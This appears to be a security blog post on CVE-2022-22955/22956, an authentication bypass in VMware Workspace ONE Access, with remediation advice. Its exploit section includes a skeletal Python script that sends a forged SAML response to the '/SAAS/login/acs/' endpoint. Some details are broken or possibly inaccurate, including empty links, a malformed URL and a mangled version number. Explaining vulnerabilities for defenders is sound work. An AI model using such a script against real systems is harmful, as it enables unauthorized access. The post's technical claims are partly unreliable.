If you work with VMware Workspace ONE Access (formerly VMware Identity Manager), you've probably heard whispers about critical vulnerabilities that surfaced in 2022—specifically, CVE-2022-22955 and CVE-2022-22956. These aren’t just your run-of-the-mill bugs: they allow a malicious actor to bypass authentication mechanisms altogether, thanks to flaws in the OAuth2 ACS framework, and then execute any operation on the vulnerable instance.
This post breaks down what makes CVE-2022-22956 especially dangerous, how the exploit works, and what you or your organization must do to stay safe. Let’s dig in—with code snippets, plain language, and direct links to all the critical details.
What is VMware Workspace ONE Access?
Workspace ONE Access helps organizations control access to apps, VDI resources, and integrations—usually acting as a secure authentication gateway. But a vulnerability here affects the _core_ of your identity infrastructure.
How Bad Is It?
Put simply: An attacker can submit a specially-crafted HTTP request to skip login requirements on your Workspace ONE Access instance. Once past the gates, the attacker can potentially access, modify, or delete sensitive data.
Why Do These Vulnerabilities Exist?
Both CVE-2022-22955 and CVE-2022-22956 exist because certain endpoints in the OAuth2 ACS were unintentionally exposed. These endpoints accepted requests without fully verifying the user’s identity, enabling attackers to bypass key authentication controls.
Exploit Details: How the Attack Works
The attacks outlined in CVE-2022-22956 focus on abusing weak validation in the OAuth2 ‘/SAAS/login/acs/’ endpoint.
`
https:///SAAS/login/acs/
Exploit Example (POC Code)
Below is a Python example demonstrating how a bad actor might attempt to exploit this by sending a fake SAML response to Workspace ONE Access:
import requests
target_url = "https://victim-VMware-Access/SAAS/login/acs/";
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
fake_saml_response = """
<BASE64-encoded malicious SAML assertion>
"""
payload = {
'SAMLResponse': fake_saml_response
}
response = requests.post(target_url, data=payload, headers=headers, verify=False)
print('[*] HTTP Status:', response.status_code)
print('[*] Cookies:', response.cookies)
if 'JSESSIONID' in response.cookies:
print('[*] Successfully bypassed authentication! Privileged session established.')
else:
print('[!] Exploit failed.')
_Note:_
You’d need to generate or obtain a properly-crafted Base64 SAML assertion appropriate for the instance and users you’re targeting.
VMware Advisory:
NIST NVD Entry:
Horizon3.ai POC & Writeup:
How to Protect Yourself: Quick Remediation Steps
1. Patch Now.
VMware has released patches—update _immediately_. Running Workspace ONE Access 20.10, 21.08, or 21.08..1? Get the latest fix:
- VMware Patch Download
2. Disable External Access Temporarily.
Restrict internet access to Workspace ONE Access until you’re patched.
3. Review Logs.
Check for suspicious activity in /SAAS/login/acs/ endpoints before and after patching.
4. Rotate Credentials.
If you believe you were vulnerable, refresh all admin and service account credentials.
Final Thoughts
CVE-2022-22956 isn’t a theoretical risk—it’s an open door, and malicious actors know this flaw can grant them free access to your company’s crown jewels. Make sure your VMware Workspace ONE Access instances are up to date and double-check your exposure. When an identity platform’s authentication can be bypassed, it becomes not just _your_ problem, but a catastrophe in the making.
References Recap
- VMware VMSA-2022-0011
- NIST CVE-2022-22956
- Horizon3.ai Attack Blog
Be exclusive—share this actionable info with your team so you don’t get caught off-guard by authentication bypass attacks like CVE-2022-22956.
Timeline
Published on: 04/13/2022 18:15:00 UTC
Last modified on: 04/21/2022 14:17:00 UTC